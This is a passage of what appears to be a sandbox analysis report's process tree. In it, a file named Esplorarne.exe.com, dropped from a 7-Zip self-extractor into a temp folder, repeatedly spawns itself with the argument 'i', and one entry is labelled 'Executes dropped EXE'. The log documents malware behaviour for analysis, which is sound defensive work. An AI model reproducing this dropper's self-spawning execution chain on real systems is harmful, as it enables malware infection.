        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        120⤵
        
        PID:6152
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        121⤵
        
        PID:2824
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        122⤵
        
        PID:7200
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        123⤵
        
        PID:504
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        124⤵
        
        PID:7800
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        125⤵
        
        PID:7600
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        126⤵
        Executes dropped EXE
        
        PID:5164
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        127⤵
        
        PID:5392
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        128⤵
        
        PID:7500
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        129⤵
        
        PID:3688
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        130⤵
        
        PID:7932
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        131⤵
        
        PID:7840
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        132⤵
        
        PID:4316
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        133⤵
        
        PID:2384
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        134⤵
        
        PID:2284
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        135⤵
        
        PID:5340
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        136⤵
        
        PID:5924
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        137⤵
        
        PID:1036
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        138⤵
        
        PID:8016
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        139⤵
        
        PID:5248
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        140⤵
        
        PID:5184
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        141⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        142⤵
        
        PID:7656
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        143⤵
        
        PID:6948
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        144⤵
        
        PID:1172
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        145⤵
        
        PID:4536
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        146⤵
        
        PID:6172
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        147⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        148⤵
        
        PID:4900
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        149⤵
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        150⤵
        
        PID:4284
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        151⤵
        
        PID:6240
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        152⤵
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        153⤵
        
        PID:3660
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        154⤵
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        155⤵
        
        PID:5732
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        156⤵
        
        PID:7384
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        157⤵
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        158⤵
        
        PID:4004
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        159⤵
        
        PID:6068
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        160⤵
        
        PID:7668
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        161⤵
        
        PID:5160
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        162⤵
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        163⤵
        
        PID:1648
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        164⤵
        
        PID:5832
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        165⤵
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        166⤵
        
        PID:7976
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        167⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        168⤵
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        169⤵
        
        PID:7116
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        170⤵
        
        PID:7876
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        171⤵
        
        PID:3008
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        172⤵
        
        PID:3276
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        173⤵
        
        PID:2384
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        174⤵
        
        PID:5488
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        175⤵
        
        PID:680
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        176⤵
        
        PID:1772
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        177⤵
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        178⤵
        
        PID:6236
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        179⤵
        
        PID:2284
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        180⤵
        
        PID:5312
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        181⤵
        
        PID:1104
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        182⤵
        
        PID:6168
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        183⤵
        
        PID:6452
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        184⤵
        
        PID:6460
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        185⤵
        
        PID:5276
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        186⤵
        
        PID:6220
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        187⤵
        
        PID:5396
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        188⤵
        
        PID:6312
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        189⤵
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        190⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        191⤵
        
        PID:2832
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        192⤵
        
        PID:6920
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        193⤵
        
        PID:4956
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        194⤵
        
        PID:7324
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        195⤵
        
        PID:1036
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        196⤵
        
        PID:6192
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        197⤵
        
        PID:4080
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        198⤵
        
        PID:7404
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        199⤵
        
        PID:2316
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        200⤵
        
        PID:7048
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        201⤵
        
        PID:7660
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        202⤵
        
        PID:7036
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        203⤵
        
        PID:4748
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        204⤵
        
        PID:2808
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        205⤵
        
        PID:1128
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        206⤵
        
        PID:4200
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        207⤵
        
        PID:204
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        208⤵
        
        PID:6304
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        209⤵
        
        PID:1980
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        210⤵
        
        PID:4360
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        211⤵
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        212⤵
        
        PID:4284
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        213⤵
        
        PID:7268
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        214⤵
        
        PID:2936
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        215⤵
        
        PID:4632
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        216⤵
        
        PID:5884
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        217⤵
        
        PID:1236
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        218⤵
        
        PID:3044
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        219⤵
        
        PID:7808
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        220⤵
        
        PID:5552
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        221⤵
        
        PID:5116
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        222⤵
        
        PID:3296
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        223⤵
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        224⤵
        
        PID:576
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        225⤵
        
        PID:5732
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        226⤵
        
        PID:7348
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        227⤵
        
        PID:5652
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        228⤵
        
        PID:5896
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        229⤵
        
        PID:4572
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        230⤵
        
        PID:2136
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        231⤵
        
        PID:1264
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        232⤵
        
        PID:6532
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        233⤵
        
        PID:7424
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        234⤵
        
        PID:6720
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        235⤵
        
        PID:5644
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        236⤵
        
        PID:2696
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        237⤵
        
        PID:7548
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        238⤵
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        239⤵
        
        PID:6572
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        240⤵
        
        PID:7452
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        241⤵
        
        PID:6372
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        242⤵
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        243⤵
        
        PID:5108
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        244⤵
        
        PID:6700
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        245⤵
        
        PID:6628
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        246⤵
        
        PID:7736
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        247⤵
        
        PID:1224
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        248⤵
        
        PID:5244
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        249⤵
        
        PID:6232
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        250⤵
        
        PID:5804
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        251⤵
        
        PID:3388
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        252⤵
        
        PID:1292
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        253⤵
        
        PID:7876
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        254⤵
        
        PID:1112
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        255⤵
        
        PID:6116
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        256⤵
        
        PID:5356
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        257⤵
        
        PID:5764
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
